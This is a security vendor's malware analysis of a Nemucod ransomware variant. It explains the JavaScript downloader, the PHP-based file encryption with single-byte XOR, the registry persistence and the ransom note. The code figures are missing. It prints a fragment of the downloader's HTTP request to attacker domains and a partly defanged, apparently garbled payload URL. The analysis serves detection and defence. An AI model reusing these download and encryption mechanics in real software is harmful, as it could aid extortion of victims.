JavaScript-PHP Joint Exercise Delivers Nemucod Ransomware

The ransomware Nemucod has been very prevalent in the last few months. Nemucod’s habit of frequently changing its delivery mechanism and infection vector to evade detection makes this threat very challenging to security researchers. Recently, we observed in the wild a new variant of Nemucod that shows another change. This variant downloads a PHP file along with other files. All together these payloads encrypt the victim’s machine. (You can read more about Nemucod in this McAfee Labs Threat Advisory.)

The malware’s spreading mechanism is the same as in previous versions. It arrives in a spam email with a ZIP attachment. The contents of the spam email are crafted using social engineering techniques to lure victims. The JavaScript inside the ZIP is highly obfuscated and is very tough to understand at first. The last few lines of the script (hash: 0316CC3EBA6175E27049EB1C979C2D99) look like this:


Once we deobfuscated the JavaScript, we found readable strings inside. To help understanding, we have divided the script into separate steps.

Assigning the variables:


A unique long string is assigned to a variable used later to construct the URL that downloads the malicious payload. Here we can see five domain names assigned as an array that also will be part of making the URL. The ExpandEnvironmentStrings method gets the %TEMP% location for storing the downloaded payloads.

Downloading the malicious payload:


The malware checks for a.txt in the %TEMP% folder before proceeding. If the file is present, the malware will stop. Otherwise, it uses a “for loop” to construct the URL and download the payloads.

Let’s look into this process for i=0 (because i=id and id=0) and n=1. The malware prepares the HTTP GET request in line 19 (preceding screen) and sends a synchronous HTTP request."GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&id=" + id + "&rnd=" + i + n, false);

This line resembles the following address:

hxxp:// c5Jzzaa6WhF1OaBDyD_7aoT6MtP68oT1N1Gj36WpPLjg0VeFz1fMonKZ6ZeJJpqJJWF y4u5HtbBxToPGGh5vO5vYsHh9fNB&rnd=01

From this address the malware tries to download three binaries plus one PHP and one DLL files:

  • a.exe (hash: 9F13CC0B1B3B03CBEFD8141E5F50B1C1)
  • a1.exe (hash: 9C24738B403973653B6634C9299284FB)
  • a2.exe (hash: 149640B09DC390A881EBBAFD54B7853A)
  • php4ts.dll (hash: 106FFA7E8342890798F1AE110F763471)
  • a.php (hash: B670BF0C481146C52EBE5FBD87879960).

In the same fashion the malware constructs five URLs and tries to download the five payloads to the %TEMP% location.

The downloaded payload a.exe is the official PHP interpreter.



Registry key modifications and deleting files:


We further deobfuscated the script and found more readable strings:


Now we can see that a.exe accepts the a.php script. This a.exe is solely a PHP interpreter. For the execution of a.php, the malware uses php4ts.dll and a.exe as the dependencies.

The process also adds “.Crypted” registry names under HKEY_CURRENT_USER Run and HKEY_CLASSES_ROOT Run to start the .txt startup. After infecting the system, the malware deletes the payloads a.php, a.exe, and php4ts.dll.

The ransom note:


Once the payloads are downloaded, the file a.txt is created on the desktop and is later renamed DECRYPT.txt, which contains the ransom note. Lines 49 to 87, above, create the ransom note.

The PHP script:


In line 3 the PHP script uses set_time_limit(0) to remove time restrictions and keep the script running as long as it wants. This script uses only one major function, Tree(), which makes calls within the loop. The “for loop” checks for the directory chr(67) [C] to chr(90) [Z] with the help of the is_dir() function. Inside the Tree() function, the variable $k contains a hardcoded Base64-encoded string that encrypts the file. Then the malware uses the preg_match() function to perform a regular expression match to check if the path passed as an argument to the function contains any terms as shown in line 13 above. The function checks for certain folder names in the root directories.

The malware iterates until it finds a match. After a successful match, it checks the hardcoded extensions using the preg_match() function, on line 25, and encrypts them with the extension .crypted. On line 31 we see the encryption process using a single-byte XOR with the variable $k.

The ransom note requires the payment of 0.37070 Bitcoins to restore the files. The victim first has to pay and then enable the link to the decryption.


McAfee advises users to keep their antimalware signatures up to date at all times. McAfee products detect this malicious JavaScript and the payload, respectively, as JS/Nemucod, and PHP/Ransom.a and Trojan-FIWO! with DAT Versions 8199 and later.

Leave a Comment

17 − 10 =